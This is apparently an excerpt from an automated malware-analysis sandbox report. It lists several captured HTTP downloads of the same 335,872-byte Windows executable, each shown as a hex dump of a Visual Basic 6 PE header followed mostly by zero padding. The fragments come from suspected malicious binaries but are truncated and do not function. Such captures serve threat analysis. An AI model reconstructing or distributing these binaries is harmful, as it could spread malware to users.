00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:37 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:39 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:42 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:48 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:48 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
